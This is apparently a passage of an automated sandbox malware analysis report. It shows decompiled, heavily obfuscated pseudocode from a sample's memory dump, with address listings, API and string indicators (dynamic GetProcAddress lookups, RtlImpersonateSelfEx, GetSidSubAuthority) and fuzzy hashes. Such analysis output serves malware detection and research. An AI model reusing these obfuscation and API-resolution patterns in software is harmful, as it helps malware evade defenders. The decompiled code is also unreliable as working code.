					 *((intOrPtr*)(_t232 - 0x18)) =  *((intOrPtr*)(_t232 - 0x18)) + _t180;
					 *0x50812e = _t180;
					_t182 = 0x7b6b;
					 *0x5081ce = _t201;
					if((_t201 & 0x00009af5) == 0) {
						L8:
						if(0xe < 0x16) {
							goto L12;
						} else {
							goto L10;
						}
					} else {
						_t201 = _t201 | 0x0000aab9;
						if(_t210 != 0) {
							L11:
							_t201 =  *0x5081d2; // 0x8a5b
							L12:
							 *0x508220 = _t201;
						} else {
							_t210 = 0;
							goto L8;
						}
					}
				}
				_t76 =  *((intOrPtr*)(_t232 - 0xc));
				_push( *((intOrPtr*)(_t232 - 0x40)));
				 *0x50afe6 = _t76;
				_t131 = 0xe80e1;
				 *((intOrPtr*)(_t232 - 8)) = _t76;
				if(_t76 <= 0x23b7a8) {
					L18:
					goto L19;
				} else {
					_t131 =  *((intOrPtr*)(_t232 - 0xc)) + 0x3f7a;
					 *0x50afdc =  *0x50afdc - _t131;
					if(_t131 > _t182) {
						L19:
						if(_t131 != 0x31) {
							 *0x50815a = 0x600f;
							_t182 = 0x82;
						}
					} else {
						_t182 = _t182 + 0x68;
						 *((intOrPtr*)(_t232 - 0x1c)) =  *((intOrPtr*)(_t232 - 0x1c)) - _t182;
						 *0x5081a4 = _t201;
						_t201 = _t201 - 0x86b747;
						 *0x50820a =  *0x50820a - _t201;
						 *0x509beb =  *0x509beb + _t201;
						if(_t226 < 0) {
							goto L19;
						} else {
							if(_t226 < 0) {
								 *0x5086a7 =  *0x5086a7 + _t210;
								goto L18;
							}
						}
					}
				}
				 *0x5081dc =  *0x5081dc - _t201;
				 *((intOrPtr*)(_t232 - 8)) = GetProcAddress(??, ??);
				_t88 =  *((intOrPtr*)(_t232 - 8));
				if(0x2d9987 >= 0x2d9987) {
					L24:
					_t210 = 0x50ac14;
					 *0x50af94 =  *0x50af94 - 0x50ac14;
				} else {
					 *0x50afdd =  *0x50afdd + _t182;
					if(_t182 >= _t182) {
						_t182 = _t182 + _t182;
						_t201 =  *0x5081ae; // 0x630
						 *0x5081fc = _t201;
						 *0x508212 = _t201;
						 *0x50827a =  *0x50827a;
						 *0x50afe3 = _t88;
						_t226 = 0;
						goto L24;
					}
				}
				 *0x50808e =  *0x50808e - _t88;
				 *((intOrPtr*)(_t232 - 0x48)) = _t88;
				_t227 = _t226 + 0xb5d430;
				 *0x50afe5 = _t88;
				 *((intOrPtr*)(_t232 - 8)) = _t88;
				_t90 =  *((intOrPtr*)(_t232 - 8));
				_t139 = _t88 - _t88;
				 *((intOrPtr*)(_t232 - 8)) = _t90;
				if(_t90 < 0x1c223d) {
					if(_t90 >= 0x2a46c2) {
						 *0x50afdc =  *0x50afdc +  !(_t139 - 0x40);
						_t182 = _t182 + _t182 + 0x66cc;
					}
					 *0x5081a2 = _t201;
					_t201 = 0x9d85;
					 *0x50823e = _t227;
					_t90 = 0;
				}
				_t228 = _t227 + 0xb0a1ac;
				 *0x50afe5 = _t90;
				_t94 =  *((intOrPtr*)(_t232 - 8));
				if( *((intOrPtr*)(_t232 - 0x48)) == 0) {
					 *((intOrPtr*)(_t232 - 8)) = _t94;
					E00464241(_t201, 1, 0, _t94);
					 *0x50808a =  *0x50808a;
					_push(1);
					_push(E004FF83D);
					_push(E004BF25C);
					return 0x1edb6a;
				} else {
					 *((intOrPtr*)(_t232 - 8)) = _t94;
					 *((intOrPtr*)(_t232 - 0xc)) = 0x2d165f;
					_t145 =  *((intOrPtr*)(_t232 - 0x10)) - 0x4c;
					_t102 =  *((intOrPtr*)(_t232 - 8));
					 *((intOrPtr*)(_t232 - 0x18)) = _t145;
					if(_t182 == _t182) {
						L33:
						 *((intOrPtr*)(_t232 - 8)) = _t102;
						 *((intOrPtr*)(_t232 - 8)) = _t102;
						 *(_t232 - 0x14) = _t145 - 0xffffffffffe3b6f7 + 0x3c3e;
					} else {
						 *0x5081cc = _t201;
						_t201 = 0xa1b2;
						 *0x508264 =  *0x508264 - 0xb177;
						_t228 = 0x162ee;
						if(0 <= 0) {
							 *0x50afe6 = 0;
							goto L33;
						}
					}
					_t186 = _t201;
					_t202 =  *0x5081ce; // 0xb268
					_push( *((intOrPtr*)(_t232 + 0xc)));
					 *0x50afe6 = _t102;
					 *((intOrPtr*)(_t232 - 8)) = _t102;
					if(_t102 <= 0x1ecc) {
						L41:
						 *0x508156 = _t186;
						_t187 = _t232 - 0x20;
					} else {
						 *(_t232 - 0x14) =  *(_t232 - 0x14) - "api-ms-win-core-rtlsupport-l1-1-0.dll";
						_t191 =  *0x508136; // 0x4aea
						_t187 = _t191 - 0x67;
						if(_t187 == _t187) {
							 *((intOrPtr*)(_t232 - 0x20)) =  *((intOrPtr*)(_t232 - 0x20)) + _t187;
						}
						if((_t202 + _t202 & 0x00000097) <= 0) {
						}
						_t228 =  !_t228;
						if(0 >= 8) {
							goto L41;
						}
					}
					 *0x5081f0 = 0x8657;
					_push( *((intOrPtr*)(_t232 + 8)));
					_t106 =  *((intOrPtr*)(_t232 - 8));
					 *((intOrPtr*)(_t232 - 8)) = _t106;
					if(_t106 != 0x1c) {
						 *(_t232 - 0x14) = "EnumWindowStationsA";
						_t187 = _t187 + 0x64;
						 *0x50817a = _t187;
						if(_t187 == _t187) {
							if(0x8204 <= 0) {
							}
							 *0x50afe5 = _t106;
							goto L47;
						}
					}
					 *0x508148 = _t187 + 0x52be20;
					_push(E004FF7E4);
					_push( *((intOrPtr*)(_t232 - 0x48)));
					return  *((intOrPtr*)(_t232 - 8));
				}
			}





























                                                          0x004ff332
                                                          0x004ff332
                                                          0x004ff334
                                                          0x004ff337
                                                          0x004ff33a
                                                          0x004ff33d
                                                          0x004ff344
                                                          0x004ff34a
                                                          0x004ff352
                                                          0x004ff35b
                                                          0x004ff36f
                                                          0x004ff373
                                                          0x004ff375
                                                          0x004ff37c
                                                          0x004ff37d
                                                          0x004ff387
                                                          0x004ff387
                                                          0x004ff38e
                                                          0x004ff393
                                                          0x004ff393
                                                          0x004ff39d
                                                          0x004ff3a8
                                                          0x004ff3ab
                                                          0x004ff3ba
                                                          0x004ff3c0
                                                          0x004ff422
                                                          0x004ff424
                                                          0x004ff42a
                                                          0x004ff430
                                                          0x004ff43a
                                                          0x00000000
                                                          0x00000000
                                                          0x004ff3c2
                                                          0x004ff3ca
                                                          0x004ff3cd
                                                          0x004ff3dd
                                                          0x004ff3e1
                                                          0x004ff3f0
                                                          0x004ff409
                                                          0x004ff410
                                                          0x00000000
                                                          0x004ff412
                                                          0x00000000
                                                          0x004ff41f
                                                          0x004ff3f2
                                                          0x004ff3f2
                                                          0x004ff405
                                                          0x004ff43c
                                                          0x004ff43c
                                                          0x004ff443
                                                          0x004ff443
                                                          0x004ff407
                                                          0x004ff407
                                                          0x00000000
                                                          0x004ff407
                                                          0x004ff405
                                                          0x004ff3f0
                                                          0x004ff450
                                                          0x004ff453
                                                          0x004ff456
                                                          0x004ff463
                                                          0x004ff468
                                                          0x004ff470
                                                          0x004ff4b9
                                                          0x00000000
                                                          0x004ff472
                                                          0x004ff475
                                                          0x004ff47a
                                                          0x004ff482
                                                          0x004ff4c1
                                                          0x004ff4d2
                                                          0x004ff4e0
                                                          0x004ff4e9
                                                          0x004ff4e9
                                                          0x004ff484
                                                          0x004ff484
                                                          0x004ff487
                                                          0x004ff48a
                                                          0x004ff494
                                                          0x004ff49a
                                                          0x004ff4a1
                                                          0x004ff4ac
                                                          0x00000000
                                                          0x004ff4ae
                                                          0x004ff4b0
                                                          0x004ff4b2
                                                          0x00000000
                                                          0x004ff4b2
                                                          0x004ff4b0
                                                          0x004ff4ac
                                                          0x004ff482
                                                          0x004ff4ec
                                                          0x004ff4fb
                                                          0x004ff509
                                                          0x004ff50e
                                                          0x004ff54e
                                                          0x004ff554
                                                          0x004ff556
                                                          0x004ff512
                                                          0x004ff518
                                                          0x004ff520
                                                          0x004ff522
                                                          0x004ff524
                                                          0x004ff52b
                                                          0x004ff532
                                                          0x004ff53f
                                                          0x004ff546
                                                          0x004ff54c
                                                          0x00000000
                                                          0x004ff54c
                                                          0x004ff520
                                                          0x004ff565
                                                          0x004ff571
                                                          0x004ff574
                                                          0x004ff57a
                                                          0x004ff589
                                                          0x004ff591
                                                          0x004ff594
                                                          0x004ff598
                                                          0x004ff5a0
                                                          0x004ff5a7
                                                          0x004ff5ae
                                                          0x004ff5bb
                                                          0x004ff5bb
                                                          0x004ff5be
                                                          0x004ff5cf
                                                          0x004ff5d3
                                                          0x004ff5da
                                                          0x004ff5da
                                                          0x004ff5dc
                                                          0x004ff5e2
                                                          0x004ff5f9
                                                          0x004ff600
                                                          0x004ff7ff
                                                          0x004ff807
                                                          0x004ff827
                                                          0x004ff830
                                                          0x004ff832
                                                          0x004ff837
                                                          0x004ff83c
                                                          0x004ff606
                                                          0x004ff60d
                                                          0x004ff622
                                                          0x004ff62a
                                                          0x004ff62d
                                                          0x004ff630
                                                          0x004ff636
                                                          0x004ff66b
                                                          0x004ff671
                                                          0x004ff674
                                                          0x004ff682
                                                          0x004ff638
                                                          0x004ff63a
                                                          0x004ff644
                                                          0x004ff64c
                                                          0x004ff653
                                                          0x004ff65e
                                                          0x004ff660
                                                          0x00000000
                                                          0x004ff665
                                                          0x004ff65e
                                                          0x004ff692
                                                          0x004ff695
                                                          0x004ff69c
                                                          0x004ff69f
                                                          0x004ff6ac
                                                          0x004ff6b3
                                                          0x004ff702
                                                          0x004ff710
                                                          0x004ff71a
                                                          0x004ff6b5
                                                          0x004ff6bf
                                                          0x004ff6c2
                                                          0x004ff6c9
                                                          0x004ff6cf
                                                          0x004ff6d1
                                                          0x004ff6d1
                                                          0x004ff6d9
                                                          0x004ff6d9
                                                          0x004ff6ea
                                                          0x004ff6f9
                                                          0x00000000
                                                          0x004ff6fd
                                                          0x004ff6f9
                                                          0x004ff721
                                                          0x004ff72e
                                                          0x004ff753
                                                          0x004ff759
                                                          0x004ff75e
                                                          0x004ff76c
                                                          0x004ff772
                                                          0x004ff775
                                                          0x004ff77f
                                                          0x004ff786
                                                          0x004ff786
                                                          0x004ff795
                                                          0x00000000
                                                          0x004ff7a3
                                                          0x004ff77f
                                                          0x004ff7c4
                                                          0x004ff7db
                                                          0x004ff7e0
                                                          0x004ff7e3
                                                          0x004ff7e3

                                                          APIs
                                                          • GetProcAddress.KERNEL32(?,?), ref: 004FF4F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: 8%6$BuildExplicitAccessWithNameA$CNHMWL.dll$EnumWindowStationsA$GetTickCount64$P>!$RemoveVectoredExceptionHandler$RtlImpersonateSelfEx$api-ms-win-core-rtlsupport-l1-1-0.dll$xmllite.dll
                                                          • API String ID: 190572456-3400267085
                                                          • Opcode ID: bf2af1bd2475bb9d17053a8332c30bc765ff26c4f9119d4b3fd80cf46294ca2c
                                                          • Instruction ID: 0fdbdfdcd49a9609097717f2a1ee45d115053353ab9eb8032cab0f664801f284
                                                          • Opcode Fuzzy Hash: bf2af1bd2475bb9d17053a8332c30bc765ff26c4f9119d4b3fd80cf46294ca2c
                                                          • Instruction Fuzzy Hash: F3C1D179A0074A8FCB00DF78D894AEE7BB1EF38310F04407AD984E7362E679094ADB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004AB74C Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 283COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 34%
                                                          			E004AB74C() {
				void* _t67;
				void* _t71;
				void* _t77;
				void* _t79;
				void* _t80;
				void* _t85;
				void* _t89;
				void* _t92;
				DWORD* _t102;
				intOrPtr _t104;
				signed int _t125;
				void* _t147;
				short _t172;
				void* _t174;
				unsigned short _t176;
				short _t180;
				unsigned short _t189;
				void* _t199;
				signed int _t201;
				signed int _t204;
				intOrPtr _t205;
				void* _t215;
				void* _t216;
				void _t218;
				signed int _t220;
				short _t221;
				void* _t224;
				intOrPtr _t234;

				 *0x50afe1 =  *0x50afe1 + 0xa3d7;
				_t67 =  *(_t224 - 8);
				if(_t67 != 0xf) {
					L3:
					_t172 = _t172 + _t172;
					L4:
					 *0x5081ec = 0xa3d7;
					 *0x508208 = 0xa3d7;
					 *(_t224 - 0x58) = _t67;
					 *0x50afe5 = _t67;
					 *(_t224 - 8) = _t67;
					_push(_t67);
					L004A9E48();
					_t174 = _t224 - 0x18;
					_t71 =  *(_t224 - 8);
					if(1 < 0x3a) {
						L7:
						 *0x508260 =  *0x508260 + _t220;
						L8:
						 *0x5086df =  *0x5086df - _t215;
						_t216 = _t215 + _t215;
						if(_t71 <= 0x11461b) {
							_t15 = _t224 - 0x14;
							 *_t15 =  *((intOrPtr*)(_t224 - 0x14)) + 0x34a166;
							_t234 =  *_t15;
						}
						_t176 =  *0x508198; // 0xf368
						 *(_t224 - 8) =  *_t71;
						 *((intOrPtr*)(_t224 - 0x14)) = "GetAccessPermissionsForObjectW";
						E004A9734(0, "GetAccessPermissionsForObjectW", _t176, _t216, _t220, _t234);
						_t77 =  *(_t224 - 8);
						 *(_t224 - 0x5c) = _t77;
						 *(_t224 - 0x5c) =  *(_t224 - 0x5c) - 1;
						_t199 = 0x8ec0;
						 *(_t224 - 8) = _t77;
						_t79 =  *(_t224 - 8);
						_t125 =  !("RtlImpersonateSelfEx");
						 *(_t224 - 8) = _t79;
						if(_t79 <= 0x1b) {
							L14:
							 *0x508194 = _t176;
							_t199 = 0;
							goto L15;
						} else {
							if(_t125 <= 0x323a || _t125 != _t125) {
								 *((intOrPtr*)(_t224 - 0x14)) =  *((intOrPtr*)(_t224 - 0x14)) + _t125;
								_t125 =  *(_t224 - 0x18);
								_t176 = 0xffffffffff9ac37b;
								goto L14;
							} else {
								L15:
								 *0x50afe0 =  *0x50afe0 - _t199 + 0x93;
								_t80 =  *(_t224 - 8);
								_push( *(_t224 - 0x5c));
								if(_t80 == 5) {
									 *0x5080f8 =  *0x5080f8 + 0x35fdfc;
									_t125 = 0x35fdfc + _t176;
									_t189 = _t176 + _t176 + 0x606b89;
									 *0x50afde =  *0x50afde + _t189;
									_t176 = _t189 >> _t189;
								}
								_t201 =  *0x5081e6; // 0x8ae1
								 *0x508234 = _t220;
								_t221 = 0;
								 *(_t224 - 8) = _t80;
								if(0x28c957 != 0x3667) {
									_t176 =  *0x50816c; // 0x28a9
									 *0x5081ba = _t201;
								}
								_t204 = _t201 + _t201 + 0x8cb8d5 - 0xa7;
								_t132 = 0x50807f;
								 *((intOrPtr*)(_t224 - 0x14)) = 0x508080;
								 *((intOrPtr*)(_t224 - 0x14)) = 0x508080;
								_t85 =  *(_t224 - 0x4c);
								 *(_t224 - 8) = _t85;
								if(_t85 >= 0x17520d) {
									L22:
									 *0x50afe3 =  *0x50afe3 + _t85;
									goto L23;
								} else {
									_t132 = 0x5046f5;
									if(0x5046f5 < 0x5046f5) {
										L23:
										 *0x50afd8 = 0xfb;
										 *0x50850b = 0xfb;
										_t218 =  *( *(_t224 - 8));
										_t89 = _t218;
										if(_t132 == _t176) {
											_t176 = 0x6aef;
											 *0x508198 = 0x6aef;
											_t204 = 0;
											if(0 <= 0) {
												 *0x508232 = _t221;
											}
										}
										 *(_t224 - 8) = _t89;
										 *(_t224 - 0x10) = "xmllite.dll";
										_t92 =  *(_t224 - 8);
										 *(_t224 - 0x60) = _t92;
										 *0x5081ba = _t204;
										_t205 =  *0x5081ea; // 0x8772
										 *(_t224 - 8) = _t92;
										 *(_t224 - 0x10) = 0x31382f;
										 *(_t224 - 0x10) = 0x31382f;
										_t180 =  *0x508144; // 0x779d
										 *0x508196 = _t180;
										 *0x5081ae = _t205 - 0x9c55 + 0xac19;
										_t102 = GetSidSubAuthority( *(_t224 - 0x60), ??);
										 *0x50afe0 =  *0x50afe0 + 0xffffffffffff6655;
										if(5 < 0) {
											L28:
											if(_t102 <= 0x1e) {
												goto L31;
											}
											 *0x508078 =  *0x508078 - _t102;
											goto L30;
										} else {
											 *0x5086e7 =  *0x5086e7 + _t218;
											 *0x50aea0 =  *0x50aea0 + _t218;
											if(_t102 <= 0xc69dd) {
												L30:
												_t180 = 0x614479;
												 *0x50afdf =  *0x50afdf - 0x614479;
												L31:
												_t147 =  *_t102;
												 *(_t224 - 8) = _t147;
												_t104 =  *0x50874f; // 0x0
												 *0x508080 =  *0x508080 - _t104;
												 *0x508098 =  *0x508098 + _t147;
												_push(E004ABB74);
												goto __ebx;
											}
											goto L28;
										}
									}
									 *0x5080f0 =  *0x5080f0 + 0x5046f5;
									_t132 =  *(_t224 - 0x18);
									_t176 = _t176 - 1 + 1;
									 *0x508192 = _t176;
									_t204 =  !0x9827;
									_t221 = _t221 + _t221;
									_t85 = 0xc3;
									goto L22;
								}
							}
						}
					}
					 *(_t224 - 0x18) =  *(_t224 - 0x18) + _t174;
					 *0x5081c6 = 0xa3d7;
					if(0xa002 == 0) {
						goto L8;
					}
					_t220 = _t220 | 0x009dc368;
					goto L7;
				}
				if("AddInUtil.exe" != 0x37f42b) {
					goto L4;
				} else {
					 *0x508152 = _t172;
					goto L3;
				}
			}































                                                          0x004ab750
                                                          0x004ab756
                                                          0x004ab75b
                                                          0x004ab780
                                                          0x004ab780
                                                          0x004ab782
                                                          0x004ab785
                                                          0x004ab78c
                                                          0x004ab796
                                                          0x004ab799
                                                          0x004ab7a6
                                                          0x004ab7a9
                                                          0x004ab7aa
                                                          0x004ab7bd
                                                          0x004ab7c8
                                                          0x004ab7d0
                                                          0x004ab801
                                                          0x004ab801
                                                          0x004ab80e
                                                          0x004ab816
                                                          0x004ab81d
                                                          0x004ab82d
                                                          0x004ab839
                                                          0x004ab839
                                                          0x004ab839
                                                          0x004ab839
                                                          0x004ab844
                                                          0x004ab861
                                                          0x004ab877
                                                          0x004ab880
                                                          0x004ab891
                                                          0x004ab894
                                                          0x004ab897
                                                          0x004ab8a5
                                                          0x004ab8a9
                                                          0x004ab8b1
                                                          0x004ab8b4
                                                          0x004ab8b6
                                                          0x004ab8bb
                                                          0x004ab8da
                                                          0x004ab8da
                                                          0x004ab8e1
                                                          0x00000000
                                                          0x004ab8bd
                                                          0x004ab8c4
                                                          0x004ab8ca
                                                          0x004ab8cd
                                                          0x004ab8d4
                                                          0x00000000
                                                          0x004ab8e4
                                                          0x004ab8e4
                                                          0x004ab8e7
                                                          0x004ab8ed
                                                          0x004ab8f0
                                                          0x004ab8f5
                                                          0x004ab907
                                                          0x004ab90e
                                                          0x004ab913
                                                          0x004ab919
                                                          0x004ab91f
                                                          0x004ab91f
                                                          0x004ab925
                                                          0x004ab92c
                                                          0x004ab933
                                                          0x004ab938
                                                          0x004ab954
                                                          0x004ab965
                                                          0x004ab96c
                                                          0x004ab96c
                                                          0x004ab97b
                                                          0x004ab990
                                                          0x004ab991
                                                          0x004ab994
                                                          0x004ab999
                                                          0x004ab99c
                                                          0x004ab9a4
                                                          0x004ab9dd
                                                          0x004ab9dd
                                                          0x00000000
                                                          0x004ab9a6
                                                          0x004ab9a8
                                                          0x004ab9b0
                                                          0x004ab9eb
                                                          0x004ab9ed
                                                          0x004ab9f2
                                                          0x004ab9fa
                                                          0x004ab9fc
                                                          0x004aba00
                                                          0x004aba02
                                                          0x004aba06
                                                          0x004aba0d
                                                          0x004aba14
                                                          0x004aba16
                                                          0x004aba16
                                                          0x004aba14
                                                          0x004aba27
                                                          0x004aba34
                                                          0x004aba37
                                                          0x004aba3a
                                                          0x004aba40
                                                          0x004aba47
                                                          0x004aba5a
                                                          0x004aba67
                                                          0x004aba91
                                                          0x004ababa
                                                          0x004abac1
                                                          0x004abac8
                                                          0x004abad6
                                                          0x004abadc
                                                          0x004abae5
                                                          0x004abb0b
                                                          0x004abb0d
                                                          0x00000000
                                                          0x00000000
                                                          0x004abb0f
                                                          0x00000000
                                                          0x004abae7
                                                          0x004abaf4
                                                          0x004abafb
                                                          0x004abb09
                                                          0x004abb18
                                                          0x004abb2b
                                                          0x004abb2e
                                                          0x004abb3a
                                                          0x004abb41
                                                          0x004abb50
                                                          0x004abb53
                                                          0x004abb58
                                                          0x004abb5f
                                                          0x004abb68
                                                          0x004abb72
                                                          0x004abb72
                                                          0x00000000
                                                          0x004abb09
                                                          0x004abae5
                                                          0x004ab9b2
                                                          0x004ab9b9
                                                          0x004ab9bd
                                                          0x004ab9be
                                                          0x004ab9d3
                                                          0x004ab9d5
                                                          0x004ab9db
                                                          0x00000000
                                                          0x004ab9db
                                                          0x004ab9a4
                                                          0x004ab8c4
                                                          0x004ab8bb
                                                          0x004ab7dd
                                                          0x004ab7ea
                                                          0x004ab7f9
                                                          0x00000000
                                                          0x00000000
                                                          0x004ab7fb
                                                          0x00000000
                                                          0x004ab7fb
                                                          0x004ab770
                                                          0x00000000
                                                          0x004ab772
                                                          0x004ab779
                                                          0x00000000
                                                          0x004ab779

                                                          APIs
                                                          • GetSidSubAuthority.ADVAPI32(?,00000001), ref: 004ABAD6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: Authority
                                                          • String ID: /81$AddInUtil.exe$CreateMutexW$GetAccessPermissionsForObjectW$Microsoft.Office.Tools.Outlook.v9.0.ni.dll$PenIMC_v0400.dll$RtlImpersonateSelfEx$WSearchMigPlugin.dll$psxdllsvr.dll$xmllite.dll
                                                          • API String ID: 3356026975-2906516509
                                                          • Opcode ID: 40e8398ffec3e97645434c8679bcbfd4d1180f68edb19f7a18c5de779d64e0ef
                                                          • Instruction ID: b4e8aa48202a3867b9726eaf1f9c5ce7a5dcb2ac5afe1edf9962b1ba8b7a9492
                                                          • Opcode Fuzzy Hash: 40e8398ffec3e97645434c8679bcbfd4d1180f68edb19f7a18c5de779d64e0ef
                                                          • Instruction Fuzzy Hash: 52B1ACB9A507468FCB00DFB8D8949ED7BB1FF3A320B04416AC984E7366E7390949D745
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0049BBE0 Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 238libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 26%
                                                          			E0049BBE0() {
				_Unknown_base(*)()* _t54;
				_Unknown_base(*)()* _t56;
				_Unknown_base(*)()* _t58;
				_Unknown_base(*)()* _t64;
				_Unknown_base(*)()* _t72;
				_Unknown_base(*)()* _t86;
				char _t88;
				signed int _t94;
				signed int _t101;
				signed int _t102;
				signed int _t106;
				signed char _t133;
				short _t141;
				void* _t143;
				short _t144;
				intOrPtr _t147;
				void* _t148;
				unsigned short _t155;
				short _t158;
				void* _t161;
				intOrPtr _t165;
				void* _t166;
				void* _t171;
				void* _t172;
				void* _t173;
				short _t174;
				short _t176;
				void* _t180;

				_t54 =  *(_t180 - 8);
				_t94 = "WcnEapAuthProxy.dll";
				if(_t133 == _t133) {
					_t133 = 0x6cf4;
					 *((intOrPtr*)(_t180 - 0x14)) =  *((intOrPtr*)(_t180 - 0x14)) - 0x6cf4;
				}
				 *0x508220 =  *0x508220 - 0x9c42;
				_t155 = 0x9c42 - _t173;
				_t174 = _t173 + 0xaf80ab;
				 *(_t180 - 8) = _t54;
				_t56 =  *(_t180 - 8);
				if(_t94 + _t54 >> _t133 >= _t94 + _t54 >> _t133) {
					 *0x508152 = _t133;
					_t133 =  *0x5081a2; // 0xea53
					_t155 = _t155 - 0x77de78;
				}
				 *(_t180 - 8) = _t56;
				if(_t56 >= 0x28) {
					_t133 = _t133 - 0x639790;
				}
				_t158 = (_t155 >> _t133) + (_t155 >> _t133) + 0x86f2dc;
				 *0x508240 = _t174;
				_t58 = GetProcAddress(??, ??);
				 *0x50afe3 = _t58;
				_t172 = _t171 + 0xde78;
				 *0x50afe6 = _t58;
				 *(_t180 - 8) = _t58;
				 *((intOrPtr*)(_t180 - 0x10)) = 0x4b;
				_t101 = "EnumWindowStationsA";
				 *(_t180 - 0xc) = _t101;
				_t102 = _t101;
				_t64 =  *(_t180 - 8);
				if(_t102 >= 0x35) {
					if(_t102 < _t102) {
					}
					_t102 = "lprmonui.dll";
				}
				 *0x5081ce = _t158;
				 *0x5091ab = _t64;
				 *(_t180 - 8) = _t64;
				if(_t64 > 0x237014) {
					_t102 =  *(_t180 - 0xc);
					if(_t102 <= _t102) {
						 *0x508104 =  *0x508104 - _t102;
					}
					 *0x50962f =  *0x50962f - _t158;
				}
				 *0x50823e =  *0x50823e - 0x9dc7;
				_t176 = 0;
				_push(0);
				_t140 = 0x8054;
				 *0x5081c4 = 0x9dc7;
				_t161 = 0;
				_t106 = "SystemPropertiesComputerName.exe";
				if(_t106 < _t106) {
					L18:
					 *0x50808e =  *0x50808e - _t106;
					_push( *0x508218);
					_t141 = _t140 - 0x6bcf;
					 *(_t180 - 0xc) =  !("lprmonui.dll");
					_t72 =  *(_t180 - 8);
					 *0x508150 = _t141;
					_t143 = _t141 + _t141 + _t141 + _t141;
					 *(_t180 - 8) = _t72;
					if(_t72 < 0x22ecec) {
						 *0x5080e8 =  *0x5080e8 + 0x3823b3;
					}
					L004668D8(_t143, _t161, _t172, _t176, _t143, _t143, 1);
					_push( *0x5080d8);
					_t144 = _t143 + 1;
					 *0x508170 = _t144;
					 *0x508afb =  *((intOrPtr*)(_t180 - 0x10));
					_push( *0x5080ce);
					 *0x508198 = _t144 + 1;
					_t165 =  *0x5081e6; // 0x8ae1
					_t166 = _t165 - 0x91ae29;
					 *0x508234 = _t176;
					_push( *0x5080c8);
					 *(_t180 - 0xc) =  *(_t180 - 0xc) + 0x4be772;
					 *(_t180 - 0xc) = 0x4be772;
					_t147 =  *0x50811c; // 0x6f15
					 *((intOrPtr*)(_t180 - 0x14)) =  *((intOrPtr*)(_t180 - 0x14)) + _t147;
					 *((intOrPtr*)(_t180 - 0x10)) = 0;
					_t86 =  *(_t180 - 8);
					_push( *0x50806e);
					if(0x51 < 0x51) {
						L23:
						 *0x50820e = _t166 - 0x92;
						goto L24;
					} else {
						_t148 = _t147 - 0x60b2;
						if(_t148 < _t148) {
							L24:
							_push( *0x508154);
							 *0x50afe3 = _t86;
							 *(_t180 - 8) = _t86;
							_push(_t86);
							_push(_t86);
							_push(0);
							_push(0x49bf7c);
							goto __eax;
						}
						E00508174 = E00508174 + _t148;
						goto L23;
					}
				} else {
					if(_t106 >= _t106) {
						L17:
						_t88 =  *0x50afe6; // -97
						 *0x50afd8 = _t88;
						goto L18;
					}
					_t106 =  *((intOrPtr*)(_t180 - 0x10));
					 *0x50afde =  *0x50afde + 0xffffffffffa8c0d3;
					_t140 = 0xbadbad;
					_t161 = 0x9125;
					 *0x509a07 =  *0x509a07;
					_t176 = 0xffffffffffff476f;
					 *0x50afe3 = 0;
					if(0 < 0) {
						goto L18;
					}
					goto L17;
				}
			}































                                                          0x0049bbe1
                                                          0x0049bbe4
                                                          0x0049bbed
                                                          0x0049bbef
                                                          0x0049bbf3
                                                          0x0049bbf9
                                                          0x0049bc04
                                                          0x0049bc0b
                                                          0x0049bc0f
                                                          0x0049bc15
                                                          0x0049bc1d
                                                          0x0049bc26
                                                          0x0049bc2b
                                                          0x0049bc39
                                                          0x0049bc40
                                                          0x0049bc40
                                                          0x0049bc46
                                                          0x0049bc4b
                                                          0x0049bc62
                                                          0x0049bc62
                                                          0x0049bc70
                                                          0x0049bc76
                                                          0x0049bc7d
                                                          0x0049bc8c
                                                          0x0049bc94
                                                          0x0049bc99
                                                          0x0049bc9e
                                                          0x0049bcb1
                                                          0x0049bcc3
                                                          0x0049bcc8
                                                          0x0049bccb
                                                          0x0049bcd9
                                                          0x0049bcdf
                                                          0x0049bce3
                                                          0x0049bce3
                                                          0x0049bceb
                                                          0x0049bceb
                                                          0x0049bcf8
                                                          0x0049bcff
                                                          0x0049bd04
                                                          0x0049bd0c
                                                          0x0049bd0e
                                                          0x0049bd13
                                                          0x0049bd15
                                                          0x0049bd15
                                                          0x0049bd2d
                                                          0x0049bd2d
                                                          0x0049bd3f
                                                          0x0049bd46
                                                          0x0049bd4c
                                                          0x0049bd6e
                                                          0x0049bd72
                                                          0x0049bd79
                                                          0x0049bd87
                                                          0x0049bd8f
                                                          0x0049bddc
                                                          0x0049bddc
                                                          0x0049bdf5
                                                          0x0049bdfc
                                                          0x0049be0b
                                                          0x0049be15
                                                          0x0049be18
                                                          0x0049be21
                                                          0x0049be23
                                                          0x0049be2b
                                                          0x0049be34
                                                          0x0049be34
                                                          0x0049be41
                                                          0x0049be49
                                                          0x0049be53
                                                          0x0049be54
                                                          0x0049be71
                                                          0x0049be99
                                                          0x0049bea3
                                                          0x0049beb1
                                                          0x0049beb8
                                                          0x0049bebe
                                                          0x0049bee2
                                                          0x0049bef1
                                                          0x0049bef4
                                                          0x0049befc
                                                          0x0049bf03
                                                          0x0049bf15
                                                          0x0049bf18
                                                          0x0049bf1b
                                                          0x0049bf24
                                                          0x0049bf39
                                                          0x0049bf3e
                                                          0x00000000
                                                          0x0049bf26
                                                          0x0049bf26
                                                          0x0049bf2d
                                                          0x0049bf4d
                                                          0x0049bf4f
                                                          0x0049bf5f
                                                          0x0049bf69
                                                          0x0049bf6c
                                                          0x0049bf6d
                                                          0x0049bf6e
                                                          0x0049bf70
                                                          0x0049bf7a
                                                          0x0049bf7a
                                                          0x0049bf2f
                                                          0x00000000
                                                          0x0049bf2f
                                                          0x0049bd91
